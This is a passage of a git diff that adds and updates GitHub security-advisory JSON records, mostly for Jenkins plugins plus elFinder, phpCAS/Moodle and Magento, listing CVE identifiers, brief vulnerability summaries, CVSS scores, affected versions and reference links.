to container Plugin stored passwords unencrypted as part of its configuration. This allowed users with Jenkins master local file system access, or users with Extended Read access to the jobs it is used in, to retrieve those passwords. The Deploy to container Plugin now integrates with Credentials Plugin to store passwords securely, and automatically migrates existing passwords.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:deploy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.12" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000113" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:10:41Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json b/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json index 6a87fcee42f24..876b80330d887 100644 --- a/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json +++ b/advisories/github-reviewed/2022/05/GHSA-3qhm-qfj3-4rrx/GHSA-3qhm-qfj3-4rrx.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-3qhm-qfj3-4rrx", - "modified": "2024-01-10T19:31:04Z", + "modified": "2024-02-06T18:00:03Z", "published": "2022-05-13T01:06:16Z", "aliases": [ "CVE-2019-6257" ], "summary": "elFinder Server Side Request Forgery (SSRF)", - "details": "A Server Side Request Forgery (SSRF) vulnerability in elFinder before 2.1.46 could allow a malicious user to access the content of internal network resources. This occurs in `get_remote_contents()` in `php/elFinder.class.php`.", + "details": "A Server Side Request Forgery (SSRF) vulnerability in elFinder before 2.1.49 could allow a malicious user to access the content of internal network resources. This occurs in `get_remote_contents()` in `php/elFinder.class.php`.", "severity": [ { "type": "CVSS_V3", @@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "2.1.46" + "fixed": "2.1.49" } ] } @@ -44,13 +44,21 @@ "type": "WEB", "url": "https://github.com/Studio-42/elFinder/commit/2f522db8f037a66ce9040ee0b216aa4a0359286c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/studio-42/elfinder/CVE-2019-6257.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Studio-42/elFinder" }, { "type": "WEB", - "url": "https://github.com/Studio-42/elFinder/blob/68ec63c0aeca3963101aca8f842dc9f2e4c4c6d3/Changelog" + "url": "https://github.com/Studio-42/elFinder/blob/2.1.49/Changelog" + }, + { + "type": "WEB", + "url": "https://github.com/Studio-42/elFinder/releases/tag/2.1.49" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json b/advisories/github-reviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json new file mode 100644 index 0000000000000..dbbc544d9800a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rrg-p8xc-3457", + "modified": "2024-01-30T22:39:03Z", + "published": "2022-05-14T03:33:40Z", + "aliases": [ + "CVE-2018-1000113" + ], + "summary": "Stored cross-site scripting vulnerability in Jenkins TestLink Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins TestLink Plugin 2.12 and earlier in TestLinkBuildAction/summary.jelly and others that allow an attacker who can control e.g. TestLink report names to have Jenkins serve arbitrary HTML and JavaScript", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:testlink" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.12" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000113" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-731" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:39:03Z", + "nvd_published_at": "2018-03-13T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json b/advisories/github-reviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json new file mode 100644 index 0000000000000..1fce5ffac1d2a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vcx-w94h-68vg", + "modified": "2024-01-30T23:17:57Z", + "published": "2022-05-14T03:40:06Z", + "aliases": [ + "CVE-2018-1000055" + ], + "summary": "XXE vulnerability in Jenkins Android Lint Plugin", + "details": "Jenkins Android Lint Plugin 2.5 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:android-lint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000055" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-05/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:17:57Z", + "nvd_published_at": "2018-02-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json b/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json index 5a036c7c11334..5414d17072b4d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json +++ b/advisories/github-reviewed/2022/05/GHSA-4223-qj94-7x9p/GHSA-4223-qj94-7x9p.json @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/Studio-42/elFinder/commit/374c88d7030eb92749267e17a4af21cc7520efa5" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/studio-42/elfinder/CVE-2019-9194.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Studio-42/elFinder" diff --git a/advisories/github-reviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json b/advisories/github-reviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json new file mode 100644 index 0000000000000..13a37cf96fcac --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-449p-7c3p-vf7g", + "modified": "2024-01-30T22:30:06Z", + "published": "2022-05-13T01:25:42Z", + "aliases": [ + "CVE-2019-1003082" + ], + "summary": "CSRF vulnerability in Jenkins Gearman Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:gearman-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003082" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:30:06Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json b/advisories/github-reviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json new file mode 100644 index 0000000000000..0f8c48c79589a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json @@ -0,0 +1,116 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45ch-hxgr-vx8j", + "modified": "2024-02-07T22:50:39Z", + "published": "2022-05-13T01:13:09Z", + "aliases": [ + "CVE-2010-1618" + ], + "summary": "phpCAS client library and Moodle Cross-site Scripting vulnerability", + "details": "Cross-site scripting (XSS) vulnerability in the phpCAS client library before 1.1.0, as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled in an error message.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "apereo/phpcas" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1618" + }, + { + "type": "WEB", + "url": "https://github.com/apereo/phpCAS/commit/021633112198b37555b35340cde884d1016d9e47" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apereo/phpCAS" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html" + }, + { + "type": "WEB", + "url": "http://moodle.org/security/" + }, + { + "type": "WEB", + "url": "http://www.ja-sig.org/issues/browse/PHPCAS-52" + }, + { + "type": "WEB", + "url": "http://www.ja-sig.org/wiki/display/CASC/phpCAS+ChangeLog" + }, + { + "type": "WEB", + "url": "http://www.vupen.com/english/advisories/2010/1107" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:50:39Z", + "nvd_published_at": "2010-04-29T21:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json b/advisories/github-reviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json new file mode 100644 index 0000000000000..c69fcec397e73 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45fr-w365-f7pm", + "modified": "2024-01-30T21:43:38Z", + "published": "2022-05-13T01:17:45Z", + "aliases": [ + "CVE-2019-1003053" + ], + "summary": "Jenkins HockeyApp Plugin stores credentials in plain text", + "details": "Jenkins HockeyApp Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:hockeyapp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003053" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-839" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:43:38Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json b/advisories/github-reviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json new file mode 100644 index 0000000000000..d78cc48c24fd6 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-46rr-87h4-f5q6", + "modified": "2024-01-30T21:13:29Z", + "published": "2022-05-24T17:03:47Z", + "aliases": [ + "CVE-2019-16561" + ], + "summary": "SSL/TLS certificate validation globally and unconditionally disabled by Jenkins WebSphere Deployer Plugin ", + "details": "Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows users with Overall/Read access to disable SSL/TLS certificate and hostname validation for the entire Jenkins master JVM.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:websphere-deployer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.6.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16561" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1581" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:13:29Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json b/advisories/github-reviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json new file mode 100644 index 0000000000000..aa4f8c1118494 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-477r-v22q-r42f", + "modified": "2024-01-30T22:36:17Z", + "published": "2022-05-17T00:29:00Z", + "aliases": [ + "CVE-2017-1000088" + ], + "summary": "Persisted XSS Vulnerability in Jenkins Sidebar Link Plugin", + "details": "The Sidebar Link plugin allows users able to configure jobs, views, and agents to add entries to the sidebar of these objects. There was no input validation, which meant users were able to use javascript: schemes for these links.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:sidebar-link" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.8" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000088" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:17Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json b/advisories/github-reviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json new file mode 100644 index 0000000000000..bfc6496c277ad --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47rr-8vrp-9283", + "modified": "2024-01-30T21:23:57Z", + "published": "2022-05-24T16:52:45Z", + "aliases": [ + "CVE-2019-10375" + ], + "summary": "Arbitrary file read vulnerability in Jenkins File System SCM Plugin", + "details": "An arbitrary file read vulnerability in Jenkins File System SCM Plugin 2.1 and earlier allows attackers able to configure jobs in Jenkins to obtain the contents of any file on the Jenkins master.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins.filesystem_scm:filesystem_scm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10375" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-569" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:23:57Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json b/advisories/github-reviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json new file mode 100644 index 0000000000000..c91476e6c8c00 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-492x-gfqx-wpf3", + "modified": "2024-01-30T22:03:31Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003077" + ], + "summary": "Missing permission check in Jenkins Audit to Database Plugin", + "details": "A missing permission check in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:audit2db" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003077" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:03:31Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json b/advisories/github-reviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json new file mode 100644 index 0000000000000..eade64b0f59e7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mvc-33v7-cqc3", + "modified": "2024-01-30T22:21:58Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003087" + ], + "summary": "Missing permission check in Jenkins sinatra-chef-builder Plugin", + "details": "A missing permission check in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:sinatra-chef-builder" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.20" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003087" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:21:58Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json b/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json index 60490e91e7019..3914afad16f1f 100644 --- a/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json +++ b/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7926" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7926.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051916/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23" diff --git a/advisories/github-reviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json b/advisories/github-reviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json new file mode 100644 index 0000000000000..861759c6d989d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5293-3fgp-cr3x", + "modified": "2024-01-30T21:58:47Z", + "published": "2022-05-13T01:18:19Z", + "aliases": [ + "CVE-2017-1000086" + ], + "summary": "Missing permission checks in Jenkins Periodic Backup Plugin allow every user to change settings", + "details": "The Periodic Backup Plugin did not perform any permission checks, allowing any user with Overall/Read access to change its settings, trigger backups, restore backups, download backups, and also delete all previous backups via log rotation. Additionally, the plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:periodicbackup" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000086" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/100437" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:58:47Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json b/advisories/github-reviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json new file mode 100644 index 0000000000000..8946ecf3a44fb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5339-9974-hqj9", + "modified": "2024-01-30T22:10:56Z", + "published": "2022-05-14T02:21:28Z", + "aliases": [ + "CVE-2018-1999039" + ], + "summary": "Server-Side Request Forgery (SSRF) in Jenkins Confluence Publisher Plugin", + "details": "A server-side request forgery vulnerability exists in Jenkins Confluence Publisher Plugin 2.0.1 and earlier in ConfluenceSite.java that allows attackers to have Jenkins submit login requests to an attacker-specified Confluence server URL with attacker specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:confluence-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.0.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999039" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-982" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:10:56Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json b/advisories/github-reviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json new file mode 100644 index 0000000000000..f4843069910cd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5532-prrf-rf5x", + "modified": "2024-01-30T22:43:47Z", + "published": "2022-05-13T01:41:14Z", + "aliases": [ + "CVE-2017-1000403" + ], + "summary": "Arbitrary code execution vulnerability in Jenkins Speaks! Plugin", + "details": "Jenkins Speaks! Plugin, all current versions, allows users with Job/Configure permission to run arbitrary Groovy code inside the Jenkins JVM, effectively elevating privileges to Overall/Run Scripts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:speaks" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000403" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-10-11/" + } + ], + "database_specific": { + 